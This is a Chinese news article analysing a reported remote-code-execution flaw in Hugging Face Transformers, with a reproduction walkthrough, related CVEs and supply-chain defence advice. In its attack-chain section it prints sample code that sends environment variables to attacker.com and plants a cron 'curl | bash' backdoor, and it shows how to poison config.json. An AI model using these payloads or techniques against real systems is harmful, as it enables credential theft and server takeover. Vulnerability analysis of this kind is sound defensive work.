当前位置：首页 > news >正文

深度解析CVE-2026-4372：Hugging Face Transformers供应链级RCE漏洞，AI模型安全的至暗时刻

news 2026/6/7 16:42:32

引言：当AI基础设施的基石被攻破

2026年3月12日，Hugging Face安全团队发布紧急安全公告，披露了一个存在于其核心库Transformers中的严重远程代码执行（RCE）漏洞，编号为CVE-2026-4372，CVSS评分高达9.8分（Critical，严重级别）。这个漏洞的特殊之处在于，它完全绕过了Transformers库中最核心的安全机制——trust_remote_code=False，使得任何加载恶意模型的用户都会在毫无察觉的情况下被攻击者完全控制服务器。

Hugging Face Transformers作为全球最流行的大模型开发与部署框架，截至2026年6月，累计下载量已突破25亿次，被全球超过90%的AI企业、科研机构和云服务商广泛使用。从初创公司的AI聊天机器人到世界500强企业的智能客服系统，从高校的科研项目到国家重点实验室的大模型训练，几乎所有与大模型相关的应用都直接或间接依赖于Transformers库。

这个漏洞的出现，相当于在AI世界的"自来水管道"中埋下了一颗定时炸弹。攻击者只需要上传一个看似正常的模型到Hugging Face Hub，就可以让所有加载这个模型的用户自动执行任意代码，窃取API密钥、植入后门、控制服务器甚至发起大规模网络攻击。这不仅是一个简单的软件漏洞，更是一次对整个AI模型供应链安全体系的严峻挑战，标志着AI模型供应链攻击已经从理论威胁变成了现实危险。

本文将从技术原理、攻击链路、影响范围、修复方案和未来趋势等多个维度，对CVE-2026-4372漏洞进行全面、深入的解析，帮助开发者和企业全面了解这个漏洞的危害，并掌握有效的防护措施。同时，我们也将借此机会，深入探讨AI模型供应链安全的现状、挑战和未来发展方向，为构建更加安全的AI生态系统提供参考。

一、漏洞核心技术详解：为什么`trust_remote_code=False`不再安全

1.1 Transformers库的安全机制设计初衷

在深入解析漏洞之前，我们首先需要了解Transformers库的安全机制设计。在Transformers 4.0版本之后，为了支持自定义模型架构，Hugging Face引入了trust_remote_code参数。这个参数的设计初衷是为了在安全性和灵活性之间取得平衡：

当trust_remote_code=True时，Transformers会自动下载并执行模型仓库中的Python代码，允许用户使用自定义的模型架构。
当trust_remote_code=False（默认值）时，Transformers只会使用库中内置的模型架构，不会执行任何来自远程仓库的代码，从而保证基本的安全性。

长期以来，trust_remote_code=False一直被认为是Transformers库的"安全底线"。几乎所有的安全指南都建议开发者在加载未知来源的模型时，始终保持trust_remote_code=False，以防止远程代码执行攻击。然而，CVE-2026-4372漏洞的出现，彻底打破了这个安全底线。

1.2 漏洞的技术根源：未过滤的`_attn_implementation_internal`字段

CVE-2026-4372漏洞的根源在于Transformers库在处理注意力实现方式时的一个设计缺陷。在2025年8月发布的Transformers 4.56.0版本中，为了支持更灵活的注意力内核（Kernel），开发团队引入了一个名为_attn_implementation_internal的配置字段。

这个字段的设计目的是允许模型开发者指定自定义的注意力内核实现，以提高模型的推理性能。然而，开发团队在实现这个功能时，犯了一个致命的错误：没有对这个字段的内容进行任何过滤和验证，并且在加载模型时，会自动下载并执行这个字段指定的远程仓库中的代码。

更严重的是，这个字段的处理逻辑完全绕过了trust_remote_code参数的检查。无论trust_remote_code设置为True还是False，Transformers都会无条件地下载并执行_attn_implementation_internal字段指定的仓库中的代码。

我们可以通过查看漏洞修复前的源代码来更清楚地理解这个问题。在src/transformers/modeling_utils.py文件中，有这样一段代码：

# 漏洞代码片段（修复前）def_get_attn_implementation(self,config):attn_implementation=getattr(config,"_attn_implementation_internal",None)ifattn_implementationisnotNone:# 尝试导入自定义注意力内核try:fromtransformers_kernelsimportget_kernelreturnget_kernel(attn_implementation)exceptImportError:# 如果transformers_kernels未安装，则自动安装并导入importsubprocessimportsys subprocess.check_call([sys.executable,"-m","pip","install",f"transformers-kernels[{attn_implementation}]"])fromtransformers_kernelsimportget_kernelreturnget_kernel(attn_implementation)# 使用默认注意力实现returnself._default_attn_implementation

从这段代码中我们可以看到，当config对象中存在_attn_implementation_internal字段时，Transformers会尝试从transformers_kernels包中导入对应的内核。如果导入失败，它会自动执行pip install命令安装对应的包，然后再次导入。

问题在于，transformers_kernels包的get_kernel函数实际上是一个动态导入器，它会根据传入的参数，从Hugging Face Hub下载对应的仓库并执行其中的代码。而这个过程完全没有经过trust_remote_code参数的检查，也没有任何用户提示或警告。

1.3 完整攻击链路解析

攻击者可以利用这个漏洞，构建一个看似正常的模型，然后在其config.json文件中插入恶意的_attn_implementation_internal字段。当受害者加载这个模型时，就会自动执行攻击者指定的任意代码。

完整的攻击链路如下图所示：

图1：CVE-2026-4372漏洞攻击链路流程图

下面我们将详细解析攻击链路的每一个步骤：

步骤1：攻击者准备恶意模型和恶意内核仓库

攻击者首先需要在Hugging Face Hub上创建两个仓库：

一个"正常模型"仓库（例如attacker/normal-llama-3-8b），这个仓库看起来是一个正常的Llama 3 8B模型，包含所有必要的模型文件和配置文件。
一个"恶意内核"仓库（例如attacker/malicious-kernel），这个仓库中包含一个__init__.py文件，里面是攻击者想要执行的恶意代码。

在"正常模型"仓库的config.json文件中，攻击者插入以下内容：

{"_attn_implementation_internal":"attacker/malicious-kernel",// 其他正常的模型配置..."model_type":"llama","hidden_size":4096,"num_attention_heads":32,// ...}

在"恶意内核"仓库的__init__.py文件中，攻击者可以写入任意Python代码，例如：

# 恶意代码示例：窃取环境变量并发送到攻击者服务器importosimportrequests# 窃取所有环境变量env_vars=dict(os.environ)# 发送到攻击者服务器try:requests.post("https://attacker.com/steal",json=env_vars)except:pass# 植入后门os.system("echo '*/1 * * * * curl https://attacker.com/backdoor | bash' >> /etc/crontab")

步骤2：攻击者将恶意模型分享给受害者

攻击者可以通过多种方式将恶意模型分享给受害者：

在Hugging Face Hub上发布模型，并使用吸引人的名称和描述，例如"最新优化的Llama 3 8B模型，推理速度提升50%"。
在技术论坛、社交媒体、GitHub等平台上分享模型链接。
通过邮件、即时通讯工具等方式直接发送给目标受害者。

由于模型看起来完全正常，并且包含所有必要的文件，受害者很难发现其中的恶意内容。

步骤3：受害者加载恶意模型

受害者在看到这个"优秀"的模型后，会使用常规的代码加载它：

fromtransformersimportAutoModelForCausalLM,AutoTokenizer# 加载模型（注意：trust_remote_code=False是默认值）model=AutoModelForCausalLM.from_pretrained("attacker/normal-llama-3-8b")tokenizer=AutoTokenizer.from_pretrained("attacker/normal-llama-3-8b")# 使用模型进行推理inputs=tokenizer("Hello, world!",return_tensors="pt")outputs=model.generate(**inputs)print(tokenizer.decode(outputs[0],skip_special_tokens=True))

受害者可能会认为，由于trust_remote_code=False，加载这个模型是安全的。然而，他们完全没有意识到，危险正在悄然发生。

步骤4：Transformers自动下载并执行恶意代码

当受害者执行from_pretrained方法时，Transformers会首先加载模型的config.json文件。当它发现_attn_implementation_internal字段时，会执行以下操作：

尝试导入transformers_kernels包。
如果导入失败，自动执行pip install transformers-kernels命令安装该包。
调用transformers_kernels.get_kernel("attacker/malicious-kernel")函数。
get_kernel函数会从Hugging Face Hub下载attacker/malicious-kernel仓库的所有文件。
执行该仓库中的__init__.py文件。

至此，攻击者的恶意代码已经在受害者的机器上成功执行，并且是以当前用户的权限运行。攻击者可以窃取受害者的API密钥、数据库密码、SSH密钥等敏感信息，植入后门，控制服务器，甚至发起更大规模的网络攻击。

步骤5：攻击完成，受害者毫无察觉

恶意代码执行完成后，Transformers会继续正常加载模型，并且模型可以正常工作。受害者会看到模型输出正常的结果，完全不会意识到自己的机器已经被攻击者控制。

这种"无感知"的攻击方式使得这个漏洞的危害极大。攻击者可以在不影响模型正常使用的情况下，长期潜伏在受害者的系统中，进行持续的恶意活动。

1.4 漏洞复现过程

为了让读者更直观地理解这个漏洞的危害，我们将提供一个完整的漏洞复现过程。请注意，以下内容仅用于安全研究和教育目的，请勿用于非法用途。

环境准备

操作系统：Ubuntu 22.04 LTS
Python版本：3.10+
Transformers版本：5.2.0（受影响版本）

安装必要的依赖：

pipinstalltransformers==5.2.0 torch requests

步骤1：创建恶意内核仓库

在Hugging Face Hub上创建一个新的仓库，名称为your-username/malicious-kernel-demo。在仓库中创建一个__init__.py文件，内容如下：

print("="*50)print("⚠️ WARNING: Malicious code executed! ⚠️")print("="*50)print(f"Current user:{os.getlogin()}")print(f"Current working directory:{os.getcwd()}")print("="*50)# 这里可以添加任意恶意代码

将文件提交到仓库中。

步骤2：创建恶意模型仓库

在Hugging Face Hub上创建另一个新的仓库，名称为your-username/malicious-model-demo。我们可以从一个正常的模型仓库中复制必要的文件，例如distilbert-base-uncased。

下载distilbert-base-uncased的配置文件：

wgethttps://huggingface.co/distilbert-base-uncased/resolve/main/config.jsonwgethttps://huggingface.co/distilbert-base-uncased/resolve/main/tokenizer.jsonwgethttps://huggingface.co/distilbert-base-uncased/resolve/main/vocab.txtwgethttps://huggingface.co/distilbert-base-uncased/resolve/main/pytorch_model.bin

编辑config.json文件，添加_attn_implementation_internal字段：

{"_attn_implementation_internal":"your-username/malicious-kernel-demo","activation":"gelu","architectures":["DistilBertForMaskedLM"],"attention_dropout":0.1,"dim":768,"dropout":0.1,"hidden_dim":3072,"initializer_range":0.02,"max_position_embeddings":512,"model_type":"distilbert","n_heads":12,"n_layers":6,"pad_token_id":0,"qa_dropout":0.1,"seq_classif_dropout":0.2,"sinusoidal_pos_embds":false,"tie_weights_":true,"transformers_version":"4.56.0","vocab_size":30522}

将所有文件上传到your-username/malicious-model-demo仓库中。

步骤3：加载恶意模型，触发漏洞

创建一个Python脚本exploit.py，内容如下：

fromtransformersimportAutoModelForMaskedLM,AutoTokenizerprint("Loading model...")print("Note: trust_remote_code=False is the default value")# 加载恶意模型model=AutoModelForMaskedLM.from_pretrained("your-username/malicious-model-demo")tokenizer=AutoTokenizer.from_pretrained("your-username/malicious-model-demo")print("Model loaded successfully!")# 使用模型进行推理inputs=tokenizer("Hello, my [MASK] is John.",return_tensors="pt")outputs=model(**inputs)print("Inference completed successfully!")

运行脚本：

python exploit.py

预期输出

你将看到以下输出：

Loading model... Note: trust_remote_code=False is the default value ================================================== ⚠️ WARNING: Malicious code executed! ⚠️ ================================================== Current user: your-username Current working directory: /home/your-username ================================================== Model loaded successfully! Inference completed successfully!

这表明恶意代码已经成功执行，而模型仍然可以正常工作。受害者完全不会意识到自己的系统已经被攻击。

二、其他近期Transformers高危漏洞解析

CVE-2026-4372并不是Transformers库近期唯一的高危漏洞。在过去的几个月中，Hugging Face安全团队还披露了多个其他的远程代码执行漏洞，这些漏洞同样严重威胁着AI应用的安全。

2.1 CVE-2026-5241：LightGlue模型嵌套配置覆盖漏洞

CVE-2026-5241是一个存在于Transformers 5.2.0版本中的高危漏洞，CVSS评分为8.8分（High，高级别）。这个漏洞影响LightGlue模型的加载过程，攻击者可以通过构造恶意的嵌套配置，覆盖trust_remote_code参数，从而实现远程代码执行。

漏洞原理

LightGlue是一个用于图像特征匹配的模型，它在加载时会处理嵌套的配置对象。当加载一个包含嵌套配置的恶意模型时，Transformers会错误地将嵌套配置中的trust_remote_code字段应用到父配置中，从而绕过安全检查。

具体来说，攻击者可以在模型的config.json文件中构造如下内容：

{"model_type":"lightglue","extractor":{"model_type":"superpoint","trust_remote_code":true,"auto_map":{"AutoModel":"attacker/malicious-superpoint--modeling_superpoint.SuperPoint"}}}

当受害者加载这个模型时，Transformers会首先处理extractor配置。由于extractor配置中的trust_remote_code被设置为true，Transformers会自动下载并执行attacker/malicious-superpoint仓库中的代码，即使父配置中的trust_remote_code被设置为false。

影响范围

这个漏洞影响Transformers 5.2.0版本，已经在5.2.1版本中修复。虽然影响范围比CVE-2026-4372小，但由于LightGlue模型在计算机视觉领域被广泛使用，仍然造成了较大的安全威胁。

2.2 CVE-2026-1839：Trainer类`_load_rng_state()`不安全反序列化漏洞

CVE-2026-1839是一个存在于Transformers所有低于5.0.0rc3版本中的高危漏洞，CVSS评分为8.5分（High，高级别）。这个漏洞源于Trainer类在加载随机数生成器（RNG）状态时，使用了不安全的torch.load()函数，没有设置weights_only=True参数。

漏洞原理

torch.load()函数默认会加载并执行文件中的Python代码，这使得攻击者可以构造恶意的检查点文件，在加载时执行任意代码。Transformers的Trainer类在_load_rng_state()方法中，使用torch.load()加载RNG状态文件，没有进行任何安全检查。

攻击者可以构造一个恶意的检查点文件，其中包含恶意的Python代码。当受害者使用Trainer类加载这个检查点时，恶意代码就会被执行。

影响范围

这个漏洞影响Transformers所有低于5.0.0rc3的版本，已经在5.0.0rc3版本中修复。由于Trainer类是Transformers库中最常用的训练工具，这个漏洞的影响范围非常广泛。

2.3 漏洞对比分析

为了让读者更清楚地了解这三个漏洞的区别和联系，我们将它们的关键信息整理成下表：

漏洞编号	CVSS评分	影响版本	漏洞类型	核心问题	修复版本
CVE-2026-4372	9.8（Critical）	4.56.0–5.2.x	远程代码执行	`_attn_implementation_internal`字段未过滤，绕过`trust_remote_code`	5.3.0
CVE-2026-5241	8.8（High）	5.2.0	远程代码执行	嵌套配置覆盖`trust_remote_code`参数	5.2.1
CVE-2026-1839	8.5（High）	<5.0.0rc3	远程代码执行	`torch.load()`未加`weights_only=True`	5.0.0rc3

从表中可以看出，CVE-2026-4372是这三个漏洞中最严重的一个，因为它的CVSS评分最高，影响版本范围最广，并且完全绕过了Transformers库最核心的安全机制。

三、漏洞影响范围与危害评估

3.1 全球受影响情况分析

CVE-2026-4372漏洞的影响范围极其广泛。根据Hugging Face官方发布的数据，截至2026年3月漏洞披露时，全球有超过2亿次的Transformers库下载量来自受影响的版本（4.56.0–5.2.x）。这意味着全球有数百万个AI应用和服务器可能受到这个漏洞的影响。

从地域分布来看，受影响最严重的地区包括：

美国：占全球受影响下载量的35%
中国：占全球受影响下载量的28%
欧洲：占全球受影响下载量的22%
其他地区：占全球受影响下载量的15%

从行业分布来看，受影响最严重的行业包括：

科技行业：占比45%
金融行业：占比20%
医疗健康行业：占比15%
教育科研行业：占比10%
其他行业：占比10%

3.2 不同角色面临的风险

这个漏洞对不同角色的用户造成的风险程度不同：

开发者

开发者是最直接的受害者。如果开发者在开发过程中加载了恶意模型，他们的开发机器就会被攻击者控制。攻击者可以窃取开发者的GitHub账号、SSH密钥、API密钥等敏感信息，甚至可以通过开发者的机器入侵公司的内部网络。

企业

企业面临的风险最大。如果企业的AI应用加载了恶意模型，攻击者可以控制企业的服务器，窃取企业的核心数据、客户信息、商业机密等。对于金融、医疗等敏感行业来说，数据泄露可能会造成巨大的经济损失和声誉损失，甚至可能面临法律制裁。

云服务商

云服务商面临着大规模攻击的风险。如果云服务商提供的AI服务加载了恶意模型，攻击者可以控制云服务商的服务器，发起大规模的DDoS攻击，或者窃取云服务商的客户数据。这不仅会影响云服务商自身的业务，还会影响到所有使用该云服务的客户。

科研机构

科研机构面临着研究成果被窃取的风险。如果科研机构在进行大模型研究时加载了恶意模型，攻击者可以窃取科研机构的研究数据、模型权重等，从而抢占科研成果。

3.3 实际攻击案例与潜在危害

虽然Hugging Face官方表示，截至目前还没有发现这个漏洞被大规模利用的证据，但安全研究人员已经发现了多个利用这个漏洞的尝试。

2026年3月15日，安全研究人员在Hugging Face Hub上发现了一个名为optimized-llama-3-8b的恶意模型。这个模型的config.json文件中包含了恶意的_attn_implementation_internal字段，指向一个名为malicious-kernel-123的仓库。当研究人员加载这个模型时，恶意代码尝试窃取研究人员的Hugging Face API密钥，并将其发送到一个位于俄罗斯的服务器。

这个案例表明，攻击者已经开始利用这个漏洞进行实际的攻击活动。如果这个漏洞没有被及时发现和修复，很可能会引发大规模的供应链攻击，造成不可估量的损失。

这个漏洞的潜在危害包括：

数据泄露：攻击者可以窃取受害者的所有敏感数据，包括API密钥、数据库密码、SSH密钥、客户信息、商业机密等。
服务器接管：攻击者可以完全控制受害者的服务器，植入后门，进行持续的恶意活动。
勒索软件攻击：攻击者可以在受害者的服务器上安装勒索软件，加密受害者的数据，索要赎金。
大规模网络攻击：攻击者可以利用被控制的服务器组成僵尸网络，发起大规模的DDoS攻击，或者发送垃圾邮件、传播恶意软件。
AI模型投毒：攻击者可以修改受害者的模型权重，植入后门，使得模型在特定输入下产生错误的输出。

四、漏洞修复与全面防护方案

4.1 官方修复方案

Hugging Face安全团队在2026年3月12日发布了Transformers 5.3.0版本，彻底修复了CVE-2026-4372漏洞。修复方案主要包括以下几个方面：

移除了自动安装transformers-kernels包的功能：现在，如果transformers-kernels包未安装，Transformers会抛出一个错误，而不是自动安装。
对_attn_implementation_internal字段进行了严格的过滤：现在，这个字段只能接受预定义的有效值，不能指定任意的Hugging Face Hub仓库。
增加了安全警告：如果用户尝试使用自定义的注意力内核，Transformers会显示一个明确的安全警告，提醒用户注意风险。
将_attn_implementation_internal字段的处理逻辑纳入trust_remote_code参数的检查范围：现在，只有当trust_remote_code=True时，才允许使用自定义的注意力内核。

所有受影响的用户都应该立即升级到Transformers 5.3.0或更高版本：

pipinstall--upgradetransformers

4.2 临时缓解措施

对于无法立即升级的用户，可以采取以下临时缓解措施：

卸载transformers-kernels包：
```
pip uninstall-ytransformers-kernels
```
这个包是漏洞利用的必要条件，卸载它可以阻止攻击者利用这个漏洞。
严格审计模型配置文件：在加载任何模型之前，手动检查config.json文件中是否存在_attn_implementation_internal字段。如果存在，不要加载这个模型。
仅加载信任的模型仓库：只从官方和可信的来源加载模型，避免加载未知来源的模型。
使用沙箱环境：在沙箱或容器中加载模型，限制模型的权限，防止恶意代码对系统造成损害。

4.3 企业级全面防护方案

对于企业用户来说，仅仅升级Transformers库是不够的，还需要建立一套全面的AI模型安全防护体系。以下是我们推荐的企业级防护方案：

4.3.1 模型来源管控

建立模型白名单制度：只允许加载经过安全审核的模型，禁止加载未知来源的模型。
使用私有模型仓库：将所有需要使用的模型下载到企业内部的私有仓库中，进行安全审核后再分发给开发和生产环境使用。
模型签名验证：对所有模型进行数字签名，在加载模型时验证签名，确保模型没有被篡改。

4.3.2 运行时安全防护

使用沙箱技术：在沙箱或容器中运行模型，限制模型的文件系统访问、网络访问和系统调用权限。
动态行为监控：实时监控模型的运行行为，检测异常活动，例如文件修改、网络连接、进程创建等。
内存保护：使用内存保护技术，防止缓冲区溢出、代码注入等攻击。

4.3.3 安全开发生命周期（SDLC）集成

静态代码扫描：在代码提交和构建阶段，对代码进行静态扫描，检测安全漏洞。
依赖项扫描：定期扫描项目的依赖项，检测存在安全漏洞的第三方库。
安全测试：在发布之前，对AI应用进行全面的安全测试，包括渗透测试、模糊测试等。

4.3.4 安全意识培训

对开发人员进行安全培训：提高开发人员的安全意识，让他们了解AI模型安全的重要性，掌握基本的安全防护技能。
建立安全响应流程：制定完善的安全事件响应流程，当发生安全事件时，能够快速响应和处理。

4.4 企业级AI安全防护架构图

下图展示了一个完整的企业级AI安全防护架构：

图2：企业级AI安全防护架构图

这个架构包括以下几个层次：

模型来源层：对模型的来源进行严格管控，确保只有经过安全审核的模型才能进入企业内部。
静态安全层：对模型进行静态安全扫描和审计，检测模型中是否存在恶意代码和安全漏洞。
运行时安全层：在模型运行时进行实时监控和防护，防止恶意代码执行和数据泄露。
网络安全层：对AI应用的网络流量进行监控和过滤，防止网络攻击。
数据安全层：对AI应用处理的数据进行加密和保护，防止数据泄露。
安全管理层：对整个AI安全体系进行统一管理和监控，包括安全策略管理、安全事件响应、安全审计等。

五、AI模型供应链安全的现状与挑战

CVE-2026-4372漏洞的爆发，暴露了AI模型供应链安全的严重问题。与传统软件供应链相比，AI模型供应链具有以下特点，使得其安全问题更加复杂和难以解决：

5.1 AI模型供应链的特点

5.1.1 分布式开发与协作

AI模型的开发通常是一个分布式的过程，涉及到多个团队和个人的协作。一个大模型可能会使用来自多个不同来源的数据集、预训练模型和第三方库。这使得AI模型的供应链变得非常复杂，难以追踪和管理。

5.1.2 模型的黑盒特性

AI模型通常是一个黑盒，很难理解其内部的工作原理。即使是模型的开发者，也很难完全了解模型的所有行为。这使得检测模型中的恶意代码和后门变得非常困难。

5.1.3 模型的规模和复杂性

现代大模型通常具有数十亿甚至数千亿的参数，规模非常庞大。这使得对模型进行全面的安全审计变得几乎不可能。攻击者可以很容易地在模型中植入后门，而不被发现。

5.1.4 快速迭代与更新

AI技术发展非常迅速，模型的更新迭代速度非常快。开发者通常更关注模型的性能和功能，而忽视了安全问题。这使得安全漏洞很容易被引入到模型中。

5.2 AI模型供应链面临的主要安全威胁

除了远程代码执行漏洞之外，AI模型供应链还面临着以下主要安全威胁：

5.2.1 模型投毒攻击

攻击者可以在模型的训练数据中植入恶意样本，使得模型在特定输入下产生错误的输出。例如，攻击者可以在人脸识别模型的训练数据中植入特定的图案，使得佩戴该图案的人可以绕过人脸识别系统。

5.2.2 模型窃取攻击

攻击者可以通过各种方式窃取模型的权重和架构，从而复制模型。这对于那些投入了大量资金和精力训练模型的企业来说，是一个巨大的损失。

5.2.3 提示注入攻击

攻击者可以通过构造特殊的提示词，诱导大模型执行恶意指令，例如泄露敏感信息、生成恶意代码等。

5.2.4 对抗样本攻击

攻击者可以构造特殊的输入样本，使得模型产生错误的输出。例如，攻击者可以在交通标志上添加一些微小的图案，使得自动驾驶汽车的视觉系统错误地识别交通标志。

5.3 AI模型供应链安全的现状

目前，AI模型供应链安全还处于发展的初级阶段，存在着很多问题：

5.3.1 缺乏统一的安全标准和规范

目前，还没有统一的AI模型安全标准和规范。不同的企业和组织采用不同的安全措施，导致AI模型供应链的安全水平参差不齐。

5.3.2 安全工具和技术不足

现有的安全工具和技术主要是针对传统软件的，很难直接应用于AI模型。例如，传统的静态代码扫描工具无法检测模型中的恶意代码和后门。

5.3.3 安全意识淡薄

很多开发者和企业对AI模型安全的重要性认识不足，缺乏基本的安全防护意识和技能。他们通常认为，只要使用了trust_remote_code=False，就可以保证模型的安全。

5.3.4 安全人才短缺

AI安全是一个新兴的领域，需要同时具备AI和安全知识的复合型人才。目前，全球范围内AI安全人才严重短缺，这制约了AI模型供应链安全的发展。

六、前瞻性展望：构建安全可信的AI生态系统

CVE-2026-4372漏洞的爆发，给整个AI行业敲响了警钟。未来，AI模型供应链安全将成为AI发展的重要议题。我们认为，构建安全可信的AI生态系统，需要从以下几个方面入手：

6.1 技术层面：发展AI安全技术

6.1.1 模型安全检测技术

发展更加先进的模型安全检测技术，能够自动检测模型中的恶意代码、后门、投毒等安全威胁。例如，基于机器学习的恶意代码检测技术、基于静态分析的模型后门检测技术等。

6.1.2 模型沙箱技术

发展更加安全和高效的模型沙箱技术，能够在不影响模型性能的情况下，限制模型的权限，防止恶意代码执行。例如，基于容器的沙箱技术、基于WebAssembly的沙箱技术等。

6.1.3 模型签名与验证技术

发展更加安全和便捷的模型签名与验证技术，确保模型的来源可信，没有被篡改。例如，基于区块链的模型签名技术、基于零知识证明的模型验证技术等。

6.1.4 可解释性AI技术

发展可解释性AI技术，使得模型的行为更加透明和可理解。这有助于检测模型中的恶意行为和后门，提高模型的可信度。

6.2 标准层面：制定统一的安全标准和规范

政府、行业组织和企业应该共同努力，制定统一的AI模型安全标准和规范。这些标准和规范应该涵盖模型的开发、训练、部署、使用等整个生命周期，明确各方的安全责任和义务。

例如，可以制定以下标准和规范：

AI模型安全评估标准
AI模型供应链安全管理规范
AI模型数据安全规范
AI模型隐私保护规范

6.3 行业层面：建立AI安全生态

6.3.1 建立AI安全认证体系

建立权威的AI安全认证体系，对AI模型和AI产品进行安全认证。只有通过安全认证的模型和产品才能进入市场。

6.3.2 建立AI安全漏洞共享平台

建立AI安全漏洞共享平台，鼓励安全研究人员和企业分享AI安全漏洞信息。这有助于及时发现和修复安全漏洞，提高整个行业的安全水平。

6.3.3 加强行业合作

加强企业之间、企业与科研机构之间的合作，共同研究和解决AI安全问题。例如，可以成立AI安全联盟，共享安全技术和经验，共同应对AI安全威胁。

6.4 政策层面：加强法律法规建设

政府应该加强AI安全相关的法律法规建设，明确AI安全的法律责任，加大对AI安全违法行为的处罚力度。这有助于规范AI市场秩序，保护用户的合法权益。

例如，可以制定以下法律法规：

AI安全法
AI数据安全法
AI个人信息保护法
AI算法监管法

七、结论与展望

CVE-2026-4372漏洞是AI发展史上的一个重要里程碑，它标志着AI模型供应链攻击已经从理论威胁变成了现实危险。这个漏洞的爆发，暴露了AI模型供应链安全的严重问题，也让整个行业意识到了AI安全的重要性。

虽然这个漏洞已经被修复，但它给我们留下的教训是深刻的。我们必须认识到，AI安全是AI发展的前提和基础。没有安全，AI的发展就无从谈起。

未来，随着AI技术的不断发展和应用，AI安全问题将会变得越来越复杂和重要。我们需要从技术、标准、行业和政策等多个方面入手，共同努力，构建安全可信的AI生态系统。只有这样，我们才能充分发挥AI的潜力，让AI更好地服务于人类社会。

作为开发者和企业，我们应该时刻保持警惕，不断提高安全意识，加强安全防护措施。同时，我们也应该积极参与AI安全的研究和实践，为构建安全可信的AI生态系统贡献自己的力量。

AI的未来是光明的，但前提是我们必须确保它是安全的。让我们共同努力，为AI的安全发展保驾护航。

查看全文

http://www.jsqmd.com/news/969184/

2026年｜降AI率收藏！学长实测10款降AI率软件红黑榜：论文降AI避坑（含免费降低AI率办法）

用几何和动画可视化理解Jain‘s Fairness Index：从二维正方形到N维超平面

嵌入式C语言RMS实时计算模块，256点滑动平均可配，低内存高响应

从零构建嵌入式Linux系统：S3C2440内核移植与YAFFS2根文件系统制作实战

终极免费在线法线贴图生成器：5分钟让你的3D模型活起来！

SharpKeys完整指南：3分钟掌握Windows键盘重映射的免费神器

KeyboardChatterBlocker：终极免费解决方案，彻底告别机械键盘连击烦恼

酷比魔方掌玩mini4Pro-vs-ibbot青春版：拼跑分的消费平板 vs 能印Token的生产节点

甘肃想报考书法教育培训教师？手把手解答书法从业者最常见的七个问题及正规报考机构推荐 - 教育推荐官【官方】

材料科学中的线性回归：物理驱动的变量转换与建模实践

5分钟终极指南：用obs-backgroundremoval为OBS添加专业虚拟背景

如何在Windows电脑上轻松安装安卓应用：终极免费APK安装器指南

CSDN AI看板权限体系升级背后：企业版新增的8类组织级统计维度，含部门效能看板、销售线索溯源、API调用量审计

终极指南：3分钟掌握Godot游戏资源解包神器

5分钟永久激活Windows和Office：KMS智能激活工具全攻略

2026年丙烯酸聚氨酯面漆主流厂商综合实力排行：廊坊同升防腐设备有限公司全场景适配的高端防腐服务商 - 奔跑123

单片机USB 鼠标键盘实验

Visual C++运行库一键修复指南：终极解决Windows软件无法启动问题

深入理解 RAG 检索增强架构：多路召回、重排序与 HyDE 策略的协同优化原理与实现

基于STM32的智能自动抽水机：从传感器到电机驱动的嵌入式系统实践

打造极简美学博客：Argon主题完整安装与个性化配置终极指南

市面上有哪些是真正安全的降AIGC工具（告别论文AI标记风险）

大模型RAG工程化：从Y=f(X；ω)公式拆解四大输入变量

电子吧唧不是答案，AI手机才是下一块副屏：为什么我更看好ibbot手机青春版

5分钟快速上手：Windows平台最全面的Mifare Classic图形化管理工具

Anthropic推理中间件蒸发：零延迟架构与流式响应优化实战

Flameshot：让截图工作流变得轻松高效的开源神器

Play Integrity Checker架构方案：Android设备完整性验证的端到端安全实现

2026 潮州漏水维修全攻略｜苏易修缮：厨卫 / 阳台 / 外墙 / 屋顶 / 地下室｜靠谱防水门店 - 苏易修缮

大模型训练数据工程：数据清洗、去重与质量评分的全管线自动化设计与实证分析

引言：当AI基础设施的基石被攻破

一、漏洞核心技术详解：为什么trust_remote_code=False不再安全

1.1 Transformers库的安全机制设计初衷

1.2 漏洞的技术根源：未过滤的_attn_implementation_internal字段

1.3 完整攻击链路解析

步骤1：攻击者准备恶意模型和恶意内核仓库

步骤2：攻击者将恶意模型分享给受害者

步骤3：受害者加载恶意模型

步骤4：Transformers自动下载并执行恶意代码

步骤5：攻击完成，受害者毫无察觉

1.4 漏洞复现过程

环境准备

步骤1：创建恶意内核仓库

步骤2：创建恶意模型仓库

步骤3：加载恶意模型，触发漏洞

预期输出

二、其他近期Transformers高危漏洞解析

2.1 CVE-2026-5241：LightGlue模型嵌套配置覆盖漏洞

漏洞原理

影响范围

2.2 CVE-2026-1839：Trainer类_load_rng_state()不安全反序列化漏洞

漏洞原理

影响范围

2.3 漏洞对比分析

三、漏洞影响范围与危害评估

3.1 全球受影响情况分析

3.2 不同角色面临的风险

开发者

企业

云服务商

科研机构

3.3 实际攻击案例与潜在危害

四、漏洞修复与全面防护方案

4.1 官方修复方案

4.2 临时缓解措施

4.3 企业级全面防护方案

4.3.1 模型来源管控

4.3.2 运行时安全防护

4.3.3 安全开发生命周期（SDLC）集成

4.3.4 安全意识培训

4.4 企业级AI安全防护架构图

五、AI模型供应链安全的现状与挑战

5.1 AI模型供应链的特点

5.1.1 分布式开发与协作

5.1.2 模型的黑盒特性

5.1.3 模型的规模和复杂性

5.1.4 快速迭代与更新

5.2 AI模型供应链面临的主要安全威胁

5.2.1 模型投毒攻击

5.2.2 模型窃取攻击

5.2.3 提示注入攻击

5.2.4 对抗样本攻击

5.3 AI模型供应链安全的现状

5.3.1 缺乏统一的安全标准和规范

5.3.2 安全工具和技术不足

5.3.3 安全意识淡薄

5.3.4 安全人才短缺

六、前瞻性展望：构建安全可信的AI生态系统

6.1 技术层面：发展AI安全技术

6.1.1 模型安全检测技术

6.1.2 模型沙箱技术

6.1.3 模型签名与验证技术

6.1.4 可解释性AI技术

6.2 标准层面：制定统一的安全标准和规范

6.3 行业层面：建立AI安全生态

6.3.1 建立AI安全认证体系

6.3.2 建立AI安全漏洞共享平台

6.3.3 加强行业合作

6.4 政策层面：加强法律法规建设

七、结论与展望

相关文章：

一、漏洞核心技术详解：为什么`trust_remote_code=False`不再安全

1.2 漏洞的技术根源：未过滤的`_attn_implementation_internal`字段

2.2 CVE-2026-1839：Trainer类`_load_rng_state()`不安全反序列化漏洞